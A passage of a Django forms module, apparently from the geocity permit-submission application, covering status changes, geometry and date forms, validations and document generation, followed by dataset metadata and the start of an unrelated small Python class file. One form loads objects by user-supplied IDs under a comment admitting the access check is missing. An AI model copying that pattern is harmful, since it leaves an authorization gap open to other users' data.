help_text=_(\"(Optionnel) Raison du changement du statut de la demande\"),\n )\n\n class Meta:\n model = models.Submission\n fields = [\n \"is_public\",\n \"shortname\",\n \"status\",\n ]\n widgets = {\n \"is_public\": forms.RadioSelect(\n choices=PUBLIC_TYPE_CHOICES,\n ),\n }\n\n def __init__(self, user, *args, **kwargs):\n self.instance = kwargs.get(\"instance\", None)\n initial = {}\n for prop_value in self.get_values():\n initial[\n self.get_field_name(\n prop_value.form.form_id,\n prop_value.field_id,\n )\n ] = prop_value.value\n kwargs[\"initial\"] = {**initial, **kwargs.get(\"initial\", {})}\n super().__init__(*args, **kwargs)\n\n if self.instance:\n available_statuses_for_administrative_entity = list(\n models.SubmissionWorkflowStatus.objects.get_statuses_for_administrative_entity(\n self.instance.administrative_entity\n )\n )\n\n # Add STATUS_INQUIRY_IN_PROGRESS when any form of submission can be STATUS_INQUIRY_IN_PROGRESS\n permanent_publication_enabled = self.instance.forms.filter(\n permanent_publication_enabled=False\n ).exists()\n if not permanent_publication_enabled:\n STATUS_INQUIRY_IN_PROGRESS = (\n models.Submission.STATUS_INQUIRY_IN_PROGRESS\n )\n else:\n STATUS_INQUIRY_IN_PROGRESS = None\n\n # If an amend property in the submission can always be amended, some statuses are added to the list\n if permissions.can_always_be_updated(user, self.instance):\n filter1 = [\n tup\n for tup in models.Submission.STATUS_CHOICES\n if any(i in tup for i in models.Submission.AMENDABLE_STATUSES)\n or STATUS_INQUIRY_IN_PROGRESS in tup\n ]\n else:\n filter1 = [\n tup\n for tup in models.Submission.STATUS_CHOICES\n if any(i in tup for i in models.Submission.AMENDABLE_STATUSES)\n # Add curent status even if this one cannot be changed (otherwise the wrong status is selected in the disabled dropdown)\n or self.instance.status in tup or STATUS_INQUIRY_IN_PROGRESS in tup\n ]\n\n filter2 = [\n el\n for el in filter1\n if any(i in el for i in available_statuses_for_administrative_entity)\n ]\n\n self.fields[\"status\"].choices = tuple(filter2)\n # A permit that is approved, rejected or archived cannot have its status changed and author cannot be notified anymore\n if self.instance.status not in models.Submission.EDITABLE_STATUSES:\n self.fields[\"status\"].disabled = True\n self.fields[\"notify_author\"].disabled = True\n if permissions.can_always_be_updated(user, self.instance):\n all_statuses_tuple = [\n tup\n for tup in models.Submission.STATUS_CHOICES\n if any(\n i in tup\n for i in available_statuses_for_administrative_entity\n )\n ]\n\n self.fields[\"status\"].choices = tuple(all_statuses_tuple)\n\n # Don't notify anonymous user\n if self.instance.forms.filter(is_anonymous=True).exists():\n self.fields[\"notify_author\"].widget = forms.HiddenInput()\n self.fields[\"reason\"].widget = forms.HiddenInput()\n\n # A permit that is anonymous cannot be notified\n if self.instance.forms.filter(is_anonymous=True).exists():\n self.fields[\"notify_author\"].disabled = True\n\n if not config.ENABLE_GEOCALENDAR:\n self.fields[\"shortname\"].widget = forms.HiddenInput()\n self.fields[\"is_public\"].widget = forms.HiddenInput()\n\n # Only show permanent publication button if all forms have it set to True\n if (\n not self.instance.forms.filter(\n permanent_publication_enabled=True\n ).count()\n == self.instance.forms.count()\n ):\n self.fields[\"is_public\"].widget = forms.HiddenInput()\n\n for form, field in self.get_fields():\n field_name = self.get_field_name(form.id, field.id)\n\n self.fields[field_name] = forms.CharField(\n label=field.name,\n required=field.is_mandatory,\n help_text=field.help_text,\n widget=forms.Textarea(\n attrs={\n \"rows\": 3,\n \"placeholder\": field.placeholder,\n \"class\": \"amend-field-property\",\n }\n ),\n validators=[\n RegexValidator(\n regex=field.regex_pattern,\n message=get_regex_error_message(field),\n )\n ],\n )\n\n def get_field_name(self, form_id, field_id):\n return \"{}_{}\".format(form_id, field_id)\n\n def get_fields(self):\n \"\"\"\n Return a list of tuples `(Form, SubmissionAmendField)` for the\n amend fields of the current submission. Used to create the form fields.\n \"\"\"\n fields_by_form = self.instance.get_amend_custom_fields_by_form()\n for form, fields in fields_by_form:\n for field in fields:\n yield (form, field)\n\n def get_values(self):\n \"\"\"\n Return a queryset of `SubmissionAmendFieldValue` for the custom properties\n on the current submission. They're used to set the initial value of the form\n fields.\n \"\"\"\n return self.instance.get_amend_custom_fields_values()\n\n def get_fields_by_form(self):\n \"\"\"\n Return a list of tuples `(Form, List[Field])` for each form and their fields.\n \"\"\"\n\n return [\n (\n form,\n [\n (\n self[self.get_field_name(form.id, field.id)],\n field.is_visible_by_author,\n field.is_visible_by_validators,\n )\n for field in fields\n ],\n )\n for form, fields in self.instance.get_amend_custom_fields_by_form()\n ]\n\n def get_base_fields(self):\n \"\"\"\n Return a list of base fields for the current Model Form.\n \"\"\"\n return [self[field] for field in self.base_fields]\n\n def clean_status(self):\n status = self.cleaned_data.get(\"status\")\n\n if (\n self.instance.status == models.Submission.STATUS_INQUIRY_IN_PROGRESS\n and not status == models.Submission.STATUS_INQUIRY_IN_PROGRESS\n ):\n raise ValidationError(\n _(\n \"Vous ne pouvez pas changer le status de la demande car une enquête public est en cours\"\n )\n )\n\n return status\n\n def clean_notify_author(self):\n notify_author = self.cleaned_data.get(\"notify_author\")\n\n if (\n self.cleaned_data.get(\"status\")\n == models.Submission.STATUS_AWAITING_SUPPLEMENT\n and not notify_author\n ):\n raise ValidationError(\n _(\"Vous devez notifier l'auteur pour une demande de compléments\")\n )\n\n return notify_author\n\n def clean_reason(self):\n reason = self.cleaned_data.get(\"reason\")\n\n if (\n self.cleaned_data.get(\"status\")\n == models.Submission.STATUS_AWAITING_SUPPLEMENT\n and self.cleaned_data.get(\"notify_author\")\n and not reason\n ):\n raise ValidationError(\n _(\"Vous devez fournir une raison pour la demande de compléments\")\n )\n\n return reason\n\n def save(self, commit=True):\n submission = super().save(commit=False)\n for form, field in self.get_fields():\n self.instance.set_amend_custom_field_value(\n form=form,\n field=field,\n value=self.cleaned_data[self.get_field_name(form.id, field.id)],\n )\n if commit:\n if self.cleaned_data.get(\"notify_author\"):\n self._notify_author(submission)\n submission.save()\n return submission\n\n def _notify_author(self, submission):\n sender_name = (\n f\"{submission.administrative_entity.expeditor_name} \"\n if submission.administrative_entity.expeditor_name\n else \"\"\n )\n sender = (\n f\"{sender_name}<{submission.administrative_entity.expeditor_email}>\"\n if submission.administrative_entity.expeditor_email\n else settings.DEFAULT_FROM_EMAIL\n )\n\n if submission.status == models.Submission.STATUS_AWAITING_SUPPLEMENT:\n submission_url = submission.get_absolute_url(\n reverse(\n \"submissions:submission_fields\",\n kwargs={\"submission_id\": submission.pk},\n )\n )\n request_submission_edit_text = True\n else:\n submission_url = submission.get_absolute_url(\n reverse(\n \"submissions:submission_detail\",\n kwargs={\"submission_id\": submission.pk},\n )\n )\n request_submission_edit_text = False\n\n services.send_email(\n template=\"submission_changed.txt\",\n sender=sender,\n receivers=[submission.author.email],\n subject=\"{} ({})\".format(\n _(\"Votre demande/annonce a changé de statut\"),\n submission.get_forms_names_list(),\n ),\n context={\n \"status\": dict(submission.STATUS_CHOICES)[submission.status],\n \"reason\": (\n self.cleaned_data.get(\"reason\")\n if self.cleaned_data.get(\"reason\")\n else \"\"\n ),\n \"submission_url\": submission_url,\n \"administrative_entity\": submission.administrative_entity,\n \"name\": submission.author.get_full_name(),\n \"request_submission_edit_text\": request_submission_edit_text,\n },\n )\n\n\n# extend django gis osm openlayers widget\nclass GeometryWidget(geoforms.OSMWidget):\n template_name = \"geometrywidget/geometrywidget.html\"\n map_srid = 2056\n\n @property\n def media(self):\n return forms.Media(\n css={\n \"all\": (\n \"libs/js/openlayers6/ol.css\",\n \"customWidgets/RemoteAutocomplete/remoteautocomplete.css\",\n \"libs/js/jquery-ui-custom/jquery-ui.min.css\",\n \"css/geotime.css\",\n )\n },\n js=(\n \"libs/js/openlayers6/ol.js\",\n \"libs/js/proj4js/proj4-src.js\",\n \"customWidgets/GeometryWidget/geometrywidget.js\",\n \"libs/js/jquery-ui-custom/jquery-ui.min.js\",\n ),\n )\n\n\nclass SubmissionGeoTimeForm(forms.ModelForm):\n required_css_class = \"required\"\n starts_at = forms.DateTimeField(\n label=_(\"Date de début\"),\n input_formats=[settings.DATETIME_INPUT_FORMAT],\n widget=DateTimePickerInput(\n options={\n \"format\": \"DD.MM.YYYY HH:mm\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n },\n attrs={\"autocomplete\": \"off\"},\n ).start_of(\"event days\"),\n help_text=\"Cliquer sur le champ et sélectionner la date de début à l'aide de l'outil mis à disposition\",\n )\n ends_at = forms.DateTimeField(\n label=_(\"Date de fin\"),\n input_formats=[settings.DATETIME_INPUT_FORMAT],\n widget=DateTimePickerInput(\n options={\n \"format\": \"DD.MM.YYYY HH:mm\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n },\n attrs={\"autocomplete\": \"off\"},\n ).end_of(\"event days\"),\n help_text=\"Cliquer sur le champ et sélectionner la date de fin à l'aide de l'outil mis à disposition\",\n )\n\n class Meta:\n\n model = models.SubmissionGeoTime\n fields = [\n \"geom\",\n \"starts_at\",\n \"ends_at\",\n \"comment\",\n \"external_link\",\n ]\n help_texts = {\n \"starts_at\": \"Date de début du chantier ou d'occupation du territoire. Si l'heure n'est pas pertinente, insérer 00:00.\",\n \"ends_at\": \"Date de fin du chantier ou d'occupation du territoire. Si l'heure n'est pas pertinente, insérer 23:59.\",\n }\n widgets = {\n \"geom\": GeometryWidget(),\n \"comment\": forms.Textarea(attrs={\"rows\": 2}),\n }\n\n def __init__(self, *args, **kwargs):\n self.submission = kwargs.pop(\"submission\", None)\n disable_fields = kwargs.pop(\"disable_fields\", False)\n initial = {}\n if (\n self.submission.prolongation_date\n and self.submission.prolongation_status\n == self.submission.PROLONGATION_STATUS_APPROVED\n ):\n initial[\"ends_at\"] = self.submission.prolongation_date\n\n kwargs[\"initial\"] = {**initial, **kwargs.get(\"initial\", {})}\n\n super().__init__(*args, **kwargs)\n\n required_info = self.submission.get_geotime_required_info()\n\n if (\n models.GeoTimeInfo.DATE not in required_info\n or self.instance.comes_from_automatic_geocoding\n ):\n del self.fields[\"starts_at\"]\n del self.fields[\"ends_at\"]\n if (\n models.GeoTimeInfo.GEOMETRY not in required_info\n and not self.instance.comes_from_automatic_geocoding\n ):\n del self.fields[\"geom\"]\n\n else:\n options = self.get_widget_options(self.submission)\n if options[\"geo_widget_option\"][0] == 2:\n self.fields[\"geom\"].widget = GeometryWidgetAdvanced()\n self.fields[\"geom\"].widget.attrs[\"options\"] = options\n self.fields[\"geom\"].widget.attrs[\"options\"][\n \"edit_geom\"\n ] = not disable_fields\n if (\n not config.ENABLE_GEOCALENDAR\n or self.instance.comes_from_automatic_geocoding\n or (\n (models.GeoTimeInfo.GEOMETRY and models.GeoTimeInfo.DATE)\n not in required_info\n )\n ):\n del self.fields[\"comment\"]\n del self.fields[\"external_link\"]\n if disable_fields:\n for field in self.fields.values():\n field.disabled = True\n\n min_start_date = self.submission.get_min_starts_at()\n if self.fields.get(\"starts_at\"):\n # starts_at >= min_start_date\n self.fields[\"starts_at\"].widget.config[\"options\"].update(\n {\"minDate\": min_start_date.strftime(\"%Y/%m/%d\")}\n )\n # ends_at >= starts_at\n self.fields[\"ends_at\"].widget.config[\"options\"].update(\n {\"minDate\": min_start_date.strftime(\"%Y/%m/%d\")}\n )\n\n def get_widget_options(self, submission):\n forms = submission.forms.order_by(\"-wms_layers_order\") if submission else []\n\n wms_layers = [\n form.wms_layers.strip() for form in forms if form.wms_layers != \"\"\n ]\n\n forms_set = {form for form in forms}\n has_geom = any(form.has_geometry for form in forms_set)\n has_geom_point = any(form.has_geometry_point for form in forms_set)\n has_geom_line = any(form.has_geometry_line for form in forms_set)\n has_geom_polygon = any(form.has_geometry_polygon for form in forms_set)\n\n map_widget_configuration = [\n form.map_widget_configuration.configuration\n for form in forms\n if form.map_widget_configuration != None\n ]\n\n geo_widget_option = [\n form.geo_widget_option for form in forms if form.geo_widget_option != None\n ]\n\n ftsearch_additional_searchtext_for_address_field = (\n submission.administrative_entity.additional_searchtext_for_address_field\n if submission\n else \"\"\n )\n options = {\n \"administrative_entity_url\": reverse(\n \"submissions:administrative_entities_geojson\",\n kwargs={\n \"administrative_entity_id\": submission.administrative_entity_id\n },\n )\n if submission\n else None,\n \"administrative_entity_id\": submission.administrative_entity_id\n if submission\n else None,\n \"wms_layers\": wms_layers,\n \"map_width\": \"100%\",\n \"map_height\": 400,\n \"default_center\": [2539057, 1181111],\n \"map_widget_configuration\": map_widget_configuration,\n \"geo_widget_option\": geo_widget_option,\n \"default_zoom\": 10,\n \"display_raw\": False,\n \"edit_geom\": has_geom,\n \"edit_point\": has_geom_point,\n \"edit_line\": has_geom_line,\n \"edit_polygon\": has_geom_polygon,\n \"min_zoom\": 5,\n \"wmts_capabilities_url\": settings.WMTS_GETCAP,\n \"wmts_layer\": settings.WMTS_LAYER,\n \"wmts_capabilities_url_alternative\": settings.WMTS_GETCAP_ALTERNATIVE,\n \"wmts_layer_alternative\": settings.WMTS_LAYER_ALTERNATIVE,\n \"restriction_area_enabled\": True,\n \"geometry_db_type\": \"GeometryCollection\",\n \"ftsearch_additional_searchtext_for_address_field\": ftsearch_additional_searchtext_for_address_field,\n \"ftsearch_apiurl\": settings.LOCATIONS_SEARCH_API,\n \"ftsearch_apiurl_detail\": settings.LOCATIONS_SEARCH_API_DETAILS,\n \"ftsearch_apiurl_origins\": \"address,parcel\",\n }\n\n return options\n\n def clean(self):\n cleaned_data = super().clean()\n starts_at = cleaned_data.get(\"starts_at\")\n ends_at = cleaned_data.get(\"ends_at\")\n if starts_at and ends_at:\n if ends_at <= starts_at:\n raise ValidationError(\n _(\"La date de fin doit être postérieure à la date de début.\")\n )\n\n min_starts_at = self.submission.get_min_starts_at()\n # add two hours of tolerance in the validation\n if starts_at <= min_starts_at - timedelta(hours=2):\n raise ValidationError(\n {\n \"starts_at\": _(\n \"La date de début doit être postérieure à %(date)s\"\n )\n % {\"date\": min_starts_at.strftime(\"%d.%m.%Y %H:%M\")}\n }\n )\n\n if self.submission.max_validity is not None:\n max_ends_at = starts_at + timedelta(days=self.submission.max_validity)\n if ends_at > max_ends_at + timedelta(hours=2):\n raise ValidationError(\n {\n \"ends_at\": _(\n \"La date de fin doit être au maximum: %(date)s\"\n )\n % {\"date\": max_ends_at.strftime(\"%d.%m.%Y %H:%M\")}\n }\n )\n\n def save(self, commit=True):\n instance = super().save(commit=False)\n instance.submission = self.submission\n\n if commit:\n instance.save()\n\n return instance\n\n\nclass ModelMultipleChoiceFieldWithShortname(forms.ModelMultipleChoiceField):\n \"\"\"\n Override label_from_instance to use shortname of object\n instead of __str__ method from object\n \"\"\"\n\n def label_from_instance(self, obj):\n return obj.shortname if obj.shortname else obj\n\n\nclass SubmissionValidationDepartmentSelectionForm(forms.Form):\n departments = ModelMultipleChoiceFieldWithShortname(\n queryset=PermitDepartment.objects.none(),\n widget=forms.CheckboxSelectMultiple(),\n label=_(\"Services chargés de la validation\"),\n )\n\n def __init__(self, instance, *args, **kwargs):\n self.submission = instance\n permit_request_ct = ContentType.objects.get_for_model(models.Submission)\n validate_permission = Permission.objects.get(\n codename=\"validate_submission\", content_type=permit_request_ct\n )\n submission_departments = PermitDepartment.objects.filter(\n administrative_entity=self.submission.administrative_entity,\n group__permissions=validate_permission,\n ).distinct()\n departments = []\n for validation in self.submission.validations.all():\n departments.append(validation.department)\n kwargs[\"initial\"] = dict(\n kwargs.get(\"initial\", {}),\n departments=departments\n if departments\n else submission_departments.filter(is_default_validator=True),\n )\n\n super().__init__(*args, **kwargs)\n self.fields[\"departments\"].queryset = submission_departments\n\n\nclass SubmissionValidationForm(forms.ModelForm):\n def __init__(self, user, submission, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if not permissions.has_permission_to_edit_submission_validations(\n user, submission\n ):\n self.fields[\"comment_is_visible_by_author\"].disabled = True\n\n self.fields[\"validation_status\"].choices = [\n (\n value,\n label,\n )\n for value, label in self.fields[\"validation_status\"].choices\n ]\n\n class Meta:\n model = models.SubmissionValidation\n fields = [\n \"validation_status\",\n \"comment\",\n \"comment_is_visible_by_author\",\n ]\n widgets = {\n \"validation_status\": forms.RadioSelect(),\n \"comment\": forms.Textarea(attrs={\"rows\": 3}),\n \"comment_is_visible_by_author\": forms.CheckboxInput(),\n }\n\n\nclass SubmissionValidationPokeForm(forms.Form):\n def __init__(self, instance, request, *args, **kwargs):\n self.submission = instance\n self.request = request\n\n super().__init__(*args, **kwargs)\n\n def save(self):\n return services.send_validation_reminder(\n self.submission, absolute_uri_func=self.request.build_absolute_uri\n )\n\n\nclass SubmissionProlongationForm(forms.ModelForm):\n prolongation_date = forms.DateTimeField(\n label=_(\"Nouvelle date de fin demandée\"),\n input_formats=[settings.DATETIME_INPUT_FORMAT],\n widget=DateTimePickerInput(\n options={\n \"format\": \"DD.MM.YYYY HH:mm\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n \"minDate\": (datetime.today()).strftime(\"%Y/%m/%d\"),\n }\n ).start_of(\"event days\"),\n help_text=\"Cliquer sur le champ et sélectionner la nouvelle date de fin planifiée\",\n )\n\n class Meta:\n model = models.Submission\n fields = [\n \"prolongation_date\",\n \"prolongation_comment\",\n \"prolongation_status\",\n ]\n widgets = {\n \"prolongation_comment\": forms.Textarea(attrs={\"rows\": 3}),\n }\n\n def clean(self):\n cleaned_data = super().clean()\n prolongation_date = cleaned_data.get(\"prolongation_date\")\n original_end_date = self.instance.get_geotime_objects().aggregate(\n Max(\"ends_at\")\n )[\"ends_at__max\"]\n\n if prolongation_date:\n if prolongation_date <= original_end_date:\n raise forms.ValidationError(\n _(\n \"La date de prolongation doit être postérieure à la date originale de fin (%s).\"\n )\n % original_end_date.strftime(settings.DATETIME_INPUT_FORMAT)\n )\n\n\nclass SubmissionClassifyForm(forms.ModelForm):\n required_css_class = \"required\"\n\n # Status field is set as initial value when instantiating the form in the view\n status = forms.ChoiceField(\n choices=(\n (status, label)\n for status, label in models.Submission.STATUS_CHOICES\n if status\n in [\n models.Submission.STATUS_APPROVED,\n models.Submission.STATUS_REJECTED,\n ]\n ),\n widget=forms.HiddenInput,\n disabled=True,\n )\n\n class Meta:\n model = models.Submission\n fields = [\n \"status\",\n \"validation_pdf\",\n \"additional_decision_information\",\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if not self.instance.is_validation_document_required():\n del self.fields[\"validation_pdf\"]\n\n def save(self, commit=True):\n submission = super().save(commit=False)\n\n # ModelForm doesn't set the status because the field is disabled, so let's do it manually\n if self.cleaned_data[\"status\"]:\n submission.status = self.cleaned_data[\"status\"]\n\n submission.validated_at = timezone.now()\n\n if commit:\n submission.save()\n\n return submission\n\n\nclass SubmissionComplementaryDocumentsForm(forms.ModelForm):\n authorised_departments = forms.ModelMultipleChoiceField(\n queryset=None,\n widget=forms.CheckboxSelectMultiple,\n required=False,\n )\n generate_from_model = forms.ChoiceField(\n # choices=[], # dynamically populated in __init__\n required=False,\n label=_(\"Générer à partir du modèle\"),\n )\n\n class Meta:\n model = models.SubmissionComplementaryDocument\n fields = [\n \"generate_from_model\",\n \"document\",\n \"description\",\n \"status\",\n \"authorised_departments\",\n \"document_type\",\n ]\n widgets = {\n \"description\": forms.Textarea(attrs={\"rows\": 2}),\n }\n\n def __init__(self, request, submission, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.request = request\n self.submission = submission\n self.fields[\n \"authorised_departments\"\n ].queryset = PermitDepartment.objects.filter(\n administrative_entity=submission.administrative_entity\n ).all()\n self.fields[\"authorised_departments\"].label = _(\"Département autorisé\")\n\n # TOFIX: reports that are linked to transaction should not\n # be able to be generated here but rather through the transactions' tab\n # For now, we have to get the last transaction, in order for the reports\n # linked payments to work.\n last_transaction = self.submission.get_last_transaction()\n\n # TODO: prefetch (to optimize reduce requests count)\n choices = [(\"\", _(\"Aucune sélection\"))]\n for form in self.submission.forms.all():\n subchoices = []\n parent_doc_types = form.document_types.all()\n for parent_doc_type in parent_doc_types:\n doc_types = parent_doc_type.children.all()\n for doc_type in doc_types:\n for report in doc_type.reports.filter(is_visible=True):\n if last_transaction is not None:\n subchoices.append(\n (\n f\"{form.pk}/{report.pk}/{doc_type.pk}/{last_transaction.pk}\",\n f\"{report} / {doc_type}\",\n )\n )\n else:\n subchoices.append(\n (\n f\"{form.pk}/{report.pk}/{doc_type.pk}/0\",\n f\"{report} / {doc_type}\",\n )\n )\n if subchoices:\n choices.append((f\"{form}\", subchoices))\n self.fields[\"generate_from_model\"].choices = choices\n\n parent_types = models.ComplementaryDocumentType.objects.filter(\n form__in=submission.forms.all()\n ).all()\n\n self.fields[\"document_type\"].queryset = parent_types\n\n # Document, document type are not required, as user can also use a generated report\n self.fields[\"document_type\"].required = False\n self.fields[\"document\"].required = False\n\n for parent in parent_types:\n name = \"parent_{}\".format(parent.pk)\n self.fields[name] = forms.ModelChoiceField(\n queryset=models.ComplementaryDocumentType.objects.filter(\n form=None, parent=parent\n ),\n required=False,\n )\n self.fields[name].widget.attrs[\"hidden\"] = \"\"\n self.fields[name].widget.attrs[\"class\"] = \"child-type\"\n self.fields[name].label = \"\"\n\n def save(self, commit=True):\n document = super().save(commit=False)\n # TODO: move logic to model\n # Backoffice uploads are stored together in dedicated structure and regrouped by permit_request ID\n document.document.field.upload_to = (\n f\"backoffice_uploads/{document.submission_id}\"\n )\n # set the child type as the documents type\n document.document_type = models.ComplementaryDocumentType.objects.filter(\n pk=self.cleaned_data[\n \"parent_{}\".format(self.cleaned_data[\"document_type\"].pk)\n ].pk\n ).get()\n\n if commit:\n document.save()\n\n return document\n\n def clean_document(self):\n document = self.cleaned_data.get(\"document\")\n\n # Document is not required, as user can also use a generated report\n if document:\n services.validate_file(document)\n\n return document\n\n def clean(self):\n cleaned_data = super().clean()\n\n # TODO: validation errors raised here don't appear in the template\n\n if not self.cleaned_data.get(\n \"authorised_departments\"\n ) and not self.cleaned_data.get(\"is_public\"):\n raise ValidationError(\n _(\n \"Un département doit être renseigner ou le document doit être publique\"\n )\n )\n\n if self.cleaned_data.get(\"document\") and self.cleaned_data.get(\n \"generate_from_model\"\n ):\n raise ValidationError(\n _(\n \"Vous pouvez soit uploader un fichier, soit générer un document à partir d'un modèle, mais pas les deux.\"\n )\n )\n\n if not self.cleaned_data.get(\"document\") and not self.cleaned_data.get(\n \"generate_from_model\"\n ):\n raise ValidationError(\n _(\n \"Vous devez soit uploader un fichier, soit générer un document à partir d'un modèle.\"\n )\n )\n\n # If document is null, it must be because we use a preset\n if not cleaned_data.get(\"document\"):\n generate_from_model = cleaned_data.get(\"generate_from_model\")\n try:\n (\n form_pk,\n report_pk,\n child_doc_type_pk,\n transaction_pk,\n ) = generate_from_model.split(\"/\")\n except ValueError:\n raise ValidationError(\n _(\"Selection invalide pour génération à partir du modèle !\")\n )\n\n kwargs = {\n \"form_id\": form_pk,\n \"report_id\": report_pk,\n }\n if self.submission.get_transactions():\n rel_transaction = (\n self.submission.get_transactions().filter(pk=transaction_pk).last()\n )\n if rel_transaction is not None:\n kwargs.update({\"transaction_id\": rel_transaction.pk})\n report_response = generate_report_pdf_as_response(\n self.request.user, self.submission.pk, **kwargs\n )\n cleaned_data[\"document\"] = File(\n io.BytesIO(b\"\".join(report_response.streaming_content)),\n name=report_response.filename,\n )\n # TODO CRITICAL: ensure user has access to these objects\n # •To be filtered by user\n child_doc_type = models.ComplementaryDocumentType.objects.get(\n pk=child_doc_type_pk\n )\n cleaned_data[\"document_type\"] = child_doc_type\n cleaned_data[f\"parent_{child_doc_type.pk}\"] = child_doc_type.parent\n\n if not self.cleaned_data.get(\"document_type\"):\n return cleaned_data\n\n if not cleaned_data[\"parent_{}\".format(cleaned_data.get(\"document_type\").pk)]:\n raise ValidationError(_(\"Un sous-type doit être renseigné!\"))\n\n return cleaned_data\n\n\nclass AnonymousRequestForm(forms.Form):\n required_css_class = \"required\"\n captcha = CaptchaField(required=True)\n\n\nclass SubmissionInquiryForm(forms.ModelForm):\n start_date = forms.DateField(\n label=_(\"Date de début\"),\n input_formats=[settings.DATE_INPUT_FORMAT],\n widget=DatePickerInput(\n options={\n \"format\": \"DD.MM.YYYY\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n }\n ),\n )\n end_date = forms.DateField(\n label=_(\"Date de fin\"),\n input_formats=[settings.DATE_INPUT_FORMAT],\n widget=DatePickerInput(\n options={\n \"format\": \"DD.MM.YYYY\",\n \"locale\": \"fr-CH\",\n \"useCurrent\": False,\n }\n ),\n )\n\n class Meta:\n model = models.SubmissionInquiry\n fields = [\"start_date\", \"end_date\", \"documents\"]\n\n def __init__(self, submission, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.submission = submission\n self.fields[\n \"documents\"\n ].queryset = models.SubmissionComplementaryDocument.objects.filter(\n submission=submission\n ).all()\n self.fields[\"documents\"].help_text = _(\n \"Attention, les documents non-publics seront public une fois la mise en consultation publique démarrée!\"\n )\n\n def clean_start_date(self):\n start_date = self.cleaned_data.get(\"start_date\")\n\n if start_date and start_date < datetime.today().date():\n raise ValidationError(\n _(\"La date de début doit être postérieure à la date d'aujourd'hui.\")\n )\n\n return start_date\n\n def clean(self):\n cleaned_data = super().clean()\n start_date = self.cleaned_data.get(\"start_date\")\n end_date = self.cleaned_data.get(\"end_date\")\n\n if not start_date:\n return cleaned_data\n\n if end_date < start_date:\n raise ValidationError(\n _(\"La date de fin doit être postérieure à la date de début.\")\n )\n\n overlap = models.SubmissionInquiry.objects.filter(\n Q(submission=self.submission)\n & Q(end_date__gte=start_date)\n & Q(start_date__lte=end_date)\n )\n if overlap and not self.instance.pk:\n raise ValidationError(\n _(\"Une enquête est déjà en cours pendant cette période\")\n )\n\n return cleaned_data\n\n def save(self, commit=True):\n inquiry = super().save(commit=False)\n\n # insure all the documents added to the inquiry are public\n # if, not, make them public\n for document in self.cleaned_data[\"documents\"]:\n if document.is_public:\n continue\n\n document.is_public = True\n document.save()\n\n if commit:\n inquiry.save()\n self.save_m2m()\n\n return inquiry\n\n\ndef get_submission_contacts_formset_initiated(submission, data=None):\n \"\"\"\n Return PermitActorFormSet with initial values set\n \"\"\"\n\n # Queryset with all configured contact forms for this submission\n configured_contact_forms = submission.get_contacts_forms()\n\n has_any_dynamic_contacts_forms = submission.has_any_dynamic_contacts_forms()\n\n # Get contact forms that are not filled yet for the submission\n missing_contact_forms = submission.filter_only_missing_contact_forms(\n configured_contact_forms\n )\n\n contact_initial_forms = [\n {\"contact_form\": contact_form[0]} for contact_form in missing_contact_forms\n ]\n\n nb_extra = 10\n\n if has_any_dynamic_contacts_forms:\n extra = len(contact_initial_forms) + nb_extra\n else:\n extra = len(contact_initial_forms)\n\n SubmissionContactFormset = modelformset_factory(\n models.SubmissionContact,\n form=SubmissionContactForm,\n extra=extra,\n )\n\n formset = SubmissionContactFormset(\n initial=contact_initial_forms,\n queryset=models.SubmissionContact.objects.filter(\n submission=submission\n ).select_related(\"contact\"),\n data=data,\n )\n\n mandatory_contact_forms = {\n contact_form\n for contact_form, is_mandatory, is_dynamic in configured_contact_forms\n if is_mandatory\n }\n\n for form in formset:\n form.empty_permitted = (\n \"contact_form\" not in form.initial\n or form.initial[\"contact_form\"] not in mandatory_contact_forms\n )\n form.fields[\"contact_form\"].widget.attrs[\"readonly\"] = True\n form.fields[\"contact_form\"].widget.attrs[\"hidden\"] = True\n\n if has_any_dynamic_contacts_forms:\n for extra in range(nb_extra):\n extra += 1\n new_form = formset[len(formset) - extra]\n dynamic_types = configured_contact_forms.filter(is_dynamic=True).values(\n \"type\"\n )\n types_filtered = new_form.fields[\"contact_form\"].queryset.filter(\n id__in=dynamic_types\n )\n new_form.fields[\"contact_form\"].queryset = types_filtered\n new_form.fields[\"contact_form\"].widget.attrs[\"class\"] = \"extra-form\"\n new_form.fields[\"contact_form\"].widget.attrs[\"readonly\"] = False\n new_form.fields[\"contact_form\"].widget.attrs[\"hidden\"] = False\n\n return formset\n\n\ndef get_submission_forms(submission):\n fields_form = FieldsForm(instance=submission)\n appendices_form = AppendicesForm(instance=submission)\n fields_by_object_type = dict(fields_form.get_form_fields_by_form())\n appendices_by_object_type = dict(appendices_form.get_form_fields_by_form())\n amend_custom_fields_values = submission.get_amend_custom_fields_values()\n amend_custom_properties_by_object_type = defaultdict(list)\n for value in amend_custom_fields_values:\n amend_custom_properties_by_object_type[value.form.form].append(value)\n forms_infos = [\n (\n selected_form.form,\n fields_by_object_type.get(selected_form.form, []),\n appendices_by_object_type.get(selected_form.form, []),\n amend_custom_properties_by_object_type[selected_form.form],\n )\n for selected_form in submission.selected_forms.all()\n ]\n\n return forms_infos\n\n\nclass SubmissionValidationsForm(forms.ModelForm):\n class Meta:\n model = models.SubmissionValidation\n fields = [\"department\", \"comment\", \"comment_is_visible_by_author\"]\n\n def __init__(self, *args, **kwargs):\n super(SubmissionValidationsForm, self).__init__(*args, **kwargs)\n if self.instance.id:\n self.fields[\"department\"].widget.attrs[\"readonly\"] = True\n self.fields[\"department\"].widget.attrs[\"hidden\"] = True\n","repo_name":"yverdon/geocity","sub_path":"geocity/apps/submissions/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":72388,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"29708102406","text":"from clock import Clock\nfrom calander import Calander\n\n\nclass Time(Calander, Clock):\n def __init__(self, day, month, year, hours=0, minutes=0, seconds=0):\n Calander.__init__(self, day, month, year)\n Clock.__init__(self, hours, minutes, seconds)\n\n def __str__(self):\n return Calander.__str__(self) + \", \" + Clock.__str__(self)\n\n\nif __name__ == '__main__':\n x = Time(24, 12, 57)\n print(x)\n for i in range(1000):\n x.tick()\n for i in range(1000):\n x.advance()\n 